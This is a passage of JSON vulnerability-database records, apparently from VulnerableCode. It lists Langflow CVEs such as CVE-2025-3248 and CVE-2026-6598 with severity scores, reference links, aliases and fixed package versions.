                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L39-L53",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L39-L53"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L241-L272",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L241-L272"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L394-L399",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L394-L399"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L441-L443",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L441-L443"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/services/settings/auth.py#L71-L87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/services/settings/auth.py#L71-L87"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v8hw-mh8c-jxfc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v8hw-mh8c-jxfc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33873",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33873"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v8hw-mh8c-jxfc",
                    "reference_id": "GHSA-v8hw-mh8c-jxfc",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-v8hw-mh8c-jxfc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48845?format=api",
                    "purl": "pkg:pypi/langflow@1.9.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0"
                }
            ],
            "aliases": [
                "CVE-2026-33873",
                "GHSA-v8hw-mh8c-jxfc",
                "PYSEC-2026-82"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v5pc-pdm9-97g8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37041?format=api",
            "vulnerability_id": "VCID-wv26-29b9-vqgg",
            "summary": "Langflow versions prior to 1.3.0 are susceptible to code injection in \nthe /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary\ncode.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-3248",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.92665",
                            "scoring_system": "epss",
                            "scoring_elements": "0.9976",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-3248"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/commit/faac4db133de32fcb6d483fa9ff52f40ce42bdc0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/commit/faac4db133de32fcb6d483fa9ff52f40ce42bdc0"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/6911",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Act",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/6911"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.3.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Act",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/releases/tag/1.3.0"
                },
                {
                    "reference_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-3248",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-3248"
                },
                {
                    "reference_url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai"
                },
                {
                    "reference_url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "Act",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/"
                        }
                    ],
                    "url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/langflow-unauthenticated-rce",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Act",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-08-15T19:50:13Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/langflow-unauthenticated-rce"
                },
                {
                    "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/remote/52262.txt",
                    "reference_id": "CVE-2025-3248",
                    "reference_type": "exploit",
                    "scores": [],
                    "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/remote/52262.txt"
                },
                {
                    "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52364.py",
                    "reference_id": "CVE-2025-3248",
                    "reference_type": "exploit",
                    "scores": [],
                    "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52364.py"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3248",
                    "reference_id": "CVE-2025-3248",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3248"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7",
                    "reference_id": "GHSA-rvqx-wpfh-mfx7",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7",
                    "reference_id": "GHSA-rvqx-wpfh-mfx7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/44832?format=api",
                    "purl": "pkg:pypi/langflow@1.3.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1dek-kvzf-27d1"
                        },
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-fc5h-qc2t-xqc3"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-ysnc-jyxb-6qcy"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.3.0"
                }
            ],
            "aliases": [
                "CVE-2025-3248",
                "GHSA-rvqx-wpfh-mfx7",
                "PYSEC-2025-36"
            ],
            "risk_score": 10.0,
            "exploitability": "2.0",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wv26-29b9-vqgg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89018?format=api",
            "vulnerability_id": "VCID-ypxh-x2hy-3uhb",
            "summary": "Langflow: Cleartext Storage of Authentication Settings in Project Creation Endpoint\nA security vulnerability has been detected in langflow-ai langflow up to 1.8.3. The affected element is the function create_project/encrypt_auth_settings of the file src/backend/base/Langflow/api/v1/projects.py of the component Project Creation Endpoint. Such manipulation of the argument auth_settings leads to cleartext storage in a file or on disk. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6598",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02941",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6598"
                },
                {
                    "reference_url": "https://gist.github.com/chenhouser2025/77adb3486c06c635ae4b09a3eaf90213",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/"
                        }
                    ],
                    "url": "https://gist.github.com/chenhouser2025/77adb3486c06c635ae4b09a3eaf90213"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/commit/45325f6376309a91f5017fa033a96c09c7e295e3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/commit/45325f6376309a91f5017fa033a96c09c7e295e3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6598",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6598"
                },
                {
                    "reference_url": "https://vuldb.com/submit/791921",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/"
                        }
                    ],
                    "url": "https://vuldb.com/submit/791921"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/358233",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/358233"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/358233/cti",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/358233/cti"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*"
                },
                {
